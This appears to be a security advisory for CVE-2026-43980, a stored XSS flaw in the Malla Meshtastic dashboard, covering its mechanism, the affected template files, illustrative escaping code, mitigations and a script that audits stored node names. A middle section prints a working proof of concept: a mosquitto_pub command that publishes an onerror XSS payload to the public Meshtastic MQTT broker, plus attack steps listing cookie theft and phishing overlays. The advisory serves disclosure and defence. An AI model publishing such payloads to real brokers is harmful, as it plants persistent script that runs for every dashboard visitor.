Malla dashboard, Stored Cross‑Site Scripting (XSS), CVE‑2026‑43980 (MODERATE) -DC-Jun2026-180


How It Works

The Malla dashboard collects Meshtastic network data by subscribing to public MQTT brokers. When a node announces itself, it sends a `NODEINFO_APP` message that contains two text fields, `long_name` and `short_name`. In vulnerable versions of Malla (≤0.1.7), these incoming node names are written directly into an SQLite database without any sanitisation or escaping. Later, when the dashboard renders the node list, map markers, packet details or traceroute graphs, the same unsanitised strings are inserted into the Document Object Model (DOM), again without being escaped or filtered.
An attacker who can publish a packet to a public Meshtastic MQTT broker (which accepts publishes by default) can set either `long_name` or `short_name` to an HTML/JavaScript payload such as `<img src=x onerror=alert(1)>`. The Malla capture process (malla-capture) stores that payload in the SQLite database, and from there it is served to every visitor of the dashboard. Because the payload is not encoded before it is inserted into the DOM, the browser parses it as markup and executes the event handler in the context of the dashboard's origin.
The vulnerable code is spread across several front‑end components:
– `src/malla/templates/traceroute_graph.html` (line ~832)
– `src/malla/templates/map.html` (lines ~945 and 1078)
– `src/malla/templates/packet_detail.html` (lines ~1402 and 1452)
– `src/malla/static/js/relay_node_analysis.js` (line ~124)
The attack is persistent (stored XSS) and unauthenticated; any MQTT participant – regardless of whether they are a legitimate node – can inject the payload. Once stored, the malicious code is delivered to every dashboard visitor without further interaction. The dashboard does not implement a Content Security Policy (CSP), so an attacker can load arbitrary external scripts, create phishing overlays, force redirects to malicious sites, or continuously overload the user’s browser resources, effectively breaking the dashboard for all users.
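The mechanism described above, reduced to the two rendering patterns that matter, as an added example that is not Malla's own code: one renderer drops the stored node name straight into the markup string that would later be assigned to `innerHTML` (the vulnerable pattern), the other entity-encodes every untrusted field before it enters the markup. The record shape (`node_id`, `short_name`, `long_name`) and the sample rows are constructed for illustration and do not reflect Malla's actual schema.

```javascript
// Added example (not Malla's code): a stored NODEINFO_APP node name rendered
// into HTML the vulnerable way (raw interpolation into a string destined for
// innerHTML) versus the hardened way (HTML-entity encoding at the point the
// value enters the markup). Record shape and sample rows are constructed.

// Minimal HTML-entity encoder covering the characters that can break out of
// text content or a double-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: node names are concatenated into the markup string.
// Any '<' in long_name or short_name becomes live HTML once the string is
// assigned to element.innerHTML in the dashboard's origin.
function renderNodeRowUnsafe(node) {
  return `<tr data-node="${node.node_id}">` +
         `<td>${node.short_name}</td><td>${node.long_name}</td></tr>`;
}

// Hardened pattern: every untrusted field is entity-encoded, so the payload is
// displayed as text instead of being parsed as a tag with an event handler.
function renderNodeRowSafe(node) {
  return `<tr data-node="${escapeHtml(node.node_id)}">` +
         `<td>${escapeHtml(node.short_name)}</td>` +
         `<td>${escapeHtml(node.long_name)}</td></tr>`;
}

// Constructed rows as malla-capture might have stored them: one legitimate
// node whose name contains an ampersand (it must still display correctly
// after encoding) and one whose long_name carries the advisory's payload.
const NODES = [
  { node_id: '!a1b2c3d4', short_name: 'ALFA', long_name: 'Alfa & Bravo relay' },
  { node_id: '!deadbeef', short_name: 'XSS',  long_name: '<img src=x onerror=alert(1)>' },
];

// Does the rendered markup contain an element carrying an inline event
// handler attribute? Only the unsafe renderer should ever produce one.
function containsLiveHandler(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Render the whole node table with the chosen row renderer.
function renderTable(renderRow) {
  return `<table>${NODES.map(renderRow).join('')}</table>`;
}

if (typeof module !== 'undefined' && typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderTable(renderNodeRowUnsafe));
  console.log('safe:  ', renderTable(renderNodeRowSafe));
}
```

The hardened renderer is the string-building equivalent of the `textContent` fix: if the dashboard code assigns text to an element, use `textContent`; if it must build an HTML string for `innerHTML`, every interpolated value goes through an encoder like `escapeHtml` first.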

DailyCVE Form

Platform: Malla dashboard
Version: ≤0.1.7
Vulnerability: Stored XSS
Severity: MODERATE
Date: 2026‑06‑03

Prediction: 2026‑06‑03

What Undercode Say

1. Connect to a public Meshtastic MQTT broker and publish a malicious NODEINFO packet:
mosquitto_pub -h mqtt.meshtastic.org -p 1883 -t "msh/US/2e/json/STATUS" -m '{
  "type": "NODEINFO_APP",
  "payload": {
    "long_name": "<img src=x onerror=alert(1)>",
    "short_name": "XSS"
  }
}'
2. Wait for malla-capture to store the packet (usually a few seconds):
sleep 5
3. Open the Malla dashboard and observe the stored XSS firing:
firefox http://localhost:8080
The topic, JSON field names and dashboard port above are those given with the report; adjust them to the broker region, channel and Malla configuration actually in use.

Expected outcome – every page that displays node information (e.g. the node list, map, packet detail, relay analysis) will show an alert box. The payload remains active until the malicious node name is removed from the database or the application is patched.

Exploit

An attacker only needs MQTT write access to a public broker. The steps are:
1. Craft a malicious `NODEINFO_APP` packet with `long_name` containing a JavaScript payload.
2. Publish it to any topic that will be captured by Malla (the default MQTT subscription covers all node‑announce messages).
3. Wait for the Malla capture process to store the packet in SQLite.
4. Access the dashboard – the payload executes automatically when the page loads or when a user navigates to a vulnerable component.
Because the stored payload is neither filtered nor escaped, arbitrary JavaScript runs in the dashboard's origin. Attackers can:
– Inject external scripts to steal cookies, session tokens, or API keys.
– Overlay a fake login form to harvest credentials.
– Use `window.location` to redirect visitors to a malicious clone of the dashboard.
– Continuously create DOM elements or make XHR requests to degrade performance (DoS).
The absence of a CSP means there are no browser‑level restrictions on which resources the payload may load or which actions it may perform, so the script can be hosted anywhere and pulled in at runtime.

Protection

  • Immediate upgrade – Update to Malla version 0.1.8 or later, which properly sanitises node names before storage and escapes all output in templates.
  • If an upgrade is not possible –
      • Manually escape output in the four vulnerable template/JavaScript files listed above (e.g. replace `{{ node.long_name }}` with `{{ node.long_name | escape }}` in Jinja2). Check first whether Jinja2 autoescaping is already enabled (Flask turns it on by default for `.html` templates); if it is, `{{ }}` output is already encoded and the injection points in the templates are in the embedded JavaScript that builds HTML strings from node names, not in the template expressions themselves.
      • In relay_node_analysis.js, and in the inline scripts of the templates, use `textContent` instead of `innerHTML` when inserting node names, or apply `DOMPurify.sanitize()` to the fragment before it is inserted.
  • Network‑level mitigation – Block untrusted MQTT brokers or restrict Malla's MQTT subscription to a trusted, private broker that does not accept arbitrary publishing.
  • Add a Content Security Policy – Even after fixing the injection points, a strict CSP (e.g. `script-src 'self'`) can prevent arbitrary script execution if any future injection re‑emerges. Note that `script-src 'self'` also blocks the inline `<script>` blocks in the templates, so those scripts must be moved to static files or allowed with nonces or hashes before the policy can be deployed.
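Patching the renderers stops new payloads from executing, but names captured before the patch remain in SQLite, as the "Expected outcome" above notes. The audit helper below, an added example rather than anything shipped with Malla, scans exported node records for names that are trying to be markup rather than text, so an operator can find and delete them. The record shape, the sample rows and the idea of a `nodes` export are assumptions; Malla's real table and column names may differ.

```javascript
// Added example (not Malla's code): audit node names already stored by
// malla-capture for HTML/JavaScript payloads. Record shape and sample rows
// are constructed; adapt the field names to the real SQLite schema.

// Patterns that indicate a node name is markup rather than text: a tag
// opener, an inline event handler, a javascript: URL, or an HTML entity
// that a second, naive unescape could turn back into one of those.
const SUSPICIOUS = [
  { id: 'tag',     re: /<\s*\/?\s*[a-z!?]/i },
  { id: 'handler', re: /\bon[a-z]+\s*=/i },
  { id: 'js-url',  re: /javascript\s*:/i },
  { id: 'entity',  re: /&(#x?[0-9a-f]+|lt|gt|quot|amp);/i },
];

// Returns one finding per offending field: which node, which field, which
// pattern fired, and a short excerpt for the operator to eyeball. The first
// matching pattern wins; one finding per field is enough to act on.
function auditNodeNames(nodes) {
  const findings = [];
  for (const node of nodes) {
    for (const field of ['long_name', 'short_name']) {
      const value = node[field];
      if (typeof value !== 'string') continue;
      for (const { id, re } of SUSPICIOUS) {
        if (re.test(value)) {
          findings.push({ node_id: node.node_id, field, pattern: id, excerpt: value.slice(0, 40) });
          break;
        }
      }
    }
  }
  return findings;
}

// Constructed rows resembling a "SELECT node_id, short_name, long_name FROM
// nodes" export after an attacker has published a few crafted NODEINFO_APP
// packets: one clean node, the advisory's payload, a javascript: URL and an
// entity-encoded tag that still carries an inline handler.
const SAMPLE_NODES = [
  { node_id: '!a1b2c3d4', short_name: 'ALFA', long_name: 'Alfa & Bravo relay' },
  { node_id: '!deadbeef', short_name: 'XSS',  long_name: '<img src=x onerror=alert(1)>' },
  { node_id: '!0badf00d', short_name: 'LNK',  long_name: 'click javascript:void(0)' },
  { node_id: '!c0ffee00', short_name: 'SVG',  long_name: 'node &lt;svg onload=alert(2)&gt;' },
];

// Node ids of every record with at least one finding, deduplicated, in the
// order they were first seen; this is the list to delete or rename.
function offendingNodeIds(nodes) {
  return [...new Set(auditNodeNames(nodes).map((f) => f.node_id))];
}

if (typeof module !== 'undefined' && typeof require !== 'undefined' && require.main === module) {
  for (const f of auditNodeNames(SAMPLE_NODES)) {
    console.log(`${f.node_id} ${f.field} [${f.pattern}] ${JSON.stringify(f.excerpt)}`);
  }
}
```

Run the scan against a current export of the node table on both the capture host and any replicas, remove or rename the flagged rows, and rerun it after deployment of the patched version as a regression check; the regular expressions are deliberately broad, so review each finding before deleting.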

Impact

  • Confidentiality – The attacker can read all data accessible to the dashboard’s origin (local storage, session tokens, internal API responses).
  • Integrity – The malicious script can modify the dashboard in real time (e.g. alter displayed data, inject fake nodes, or change settings).
  • Availability – A persistent DoS attack can break the dashboard for every user by, for example, repeatedly spawning `alert()` loops or overloading the browser with massive DOM manipulations.
  • Attack surface – Because Malla is often used by network administrators and researchers, a successful XSS can lead to further compromise of the underlying Meshtastic network if session credentials are stolen and reused.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
